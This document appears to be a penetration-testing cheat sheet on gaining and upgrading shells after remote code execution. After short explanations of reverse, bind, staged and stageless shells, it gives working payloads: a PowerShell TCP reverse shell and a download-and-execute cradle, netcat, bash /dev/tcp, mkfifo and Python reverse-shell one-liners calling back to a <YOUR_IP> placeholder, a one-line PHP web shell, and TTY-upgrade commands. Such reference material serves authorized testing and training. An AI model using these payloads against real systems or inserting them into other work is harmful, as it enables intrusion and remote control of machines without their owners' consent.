Shells
If you have successfully exploited a vulnerability on a system and you got Remote Code Execution (RCE), you could obtain a shell from the remote system.
Depending on the type of connection with the shell, whether it is interactive and whether the payload is staged, we can classify a shell in the following categories.
Reverse shells are when the target is forced to execute code that connects back to your computer. Reverse shells are an excellent way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, when receiving a reverse shell from a machine across the Internet, you must configure your own network or use third-party tools to obtain the shell.
Bind shells are when the code executed is used to start a listener port attached to a shell directly on the target. In some cases, this port would be accessible through the Internet or would require configuring the target network to allow port forwarding for that specific port. Then, you can connect to the port gaining remote code execution. This has the advantage of not requiring any local network configuration but may be prevented by firewalls protecting the target.
Staged payloads are sent in two parts:
- The first part is called the stager, which does not contain any shellcode, is executed directly on the target and connects back to the attacker for downloading the actual payload.
- The second part is the actual payload, which is executed directly, preventing it from being stored on the disk caught by traditional anti-virus.
Staged payloads require a particular, usually would be the Metasploit multi/handler, capable of sending different staged payloads and retrieving the final reverse shell.
Stageless payloads are entirely self-contained in one piece of code, that sends a shell back immediately to the waiting listener when executed.
Note: To differentiate between staged and stageless payloads on Metasploit and Msfvenom, staged payloads look like
windows/shell/reverse_tcp, meanwhile stageless look like windows/shell_reverse_tcp.Interactive shells allow you to interact with programs like vim, nano, sudo and execute keywords like [Ctrl]+c, [Ctrl]+l. Examples of interactive shells would be Powershell, Bash, Zsh and sh.
Non-Interactive shells limit the attacker to only interact with programs that do not require user interaction like grep, whoami, cat... Unfortunately, the majority of simple reverse and bind shells are this type of shell, making further exploitation trickier.
Nonetheless, we can upgrade a non-interactive shell into a full TTY one depending on the environment.
In this subsection, you can find a list of web pages with payloads for obtaining reverse or web shells.
# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("<YOUR_IP>",<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# COMMAND
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"
- Start a shell in a new process.
Start-Process -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"
- Netcat
# https://github.com/int0x33/nc.exe/raw/master/nc64.exe
nc.exe -e cmd.exe <YOUR_IP> <LISTENING_PORT>
bash -i >& /dev/tcp/<YOUR_IP>/<LISTENING_PORT> 0>&1
nc -e /bin/sh <YOUR_IP> <LISTENING_PORT>
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> <LISTENING_PORT> > /tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<LISTENING_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
By default, Kali-Linux has a folder with a set of web shells under
/usr/share/webshells/. Nevertheless, here is a list with more web shell payloads:Very simple webshell.
<?=`$_GET[c]`?>
A simple way to spawn a TTY shell in Linux will be by executing the following commands. Nonetheless, you can find more ways to obtain a fully TTY shell in the following link.
python3 -c "import pty; pty.spawn('/bin/bash')"
<Ctrl+z>
stty raw -echo; fg
reset
screen
export TERM=screen;export SHELL=/bin/bash;
stty rows <ROWS> columns <COLUMNS>
Note: To obtain the number of rows and columns of your terminal type
stty -a.It is not possible to obtain a fully TTY interactive shell. However, we can get something similar that still is not interactive.
Thanks to rlwrap, the attacker can edit commands before sending them and have a command history.
rlwrap nc -nvlp <LISTENING_PORT>
Another more elaborate alternative is using ConPtyShell, a fully interactive reverse shell for Windows. However, it can be detected by AVs.
How to check if you are in a 32 or 64-bit process.
[Environment]::Is64BitProcess
[IntPtr]::Size
- If Pointer size == 4 -> 32
- If Pointer size == 8 -> 64
To jump to a 64-bit process execute the following PowerShell executable.
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
Last modified 4mo ago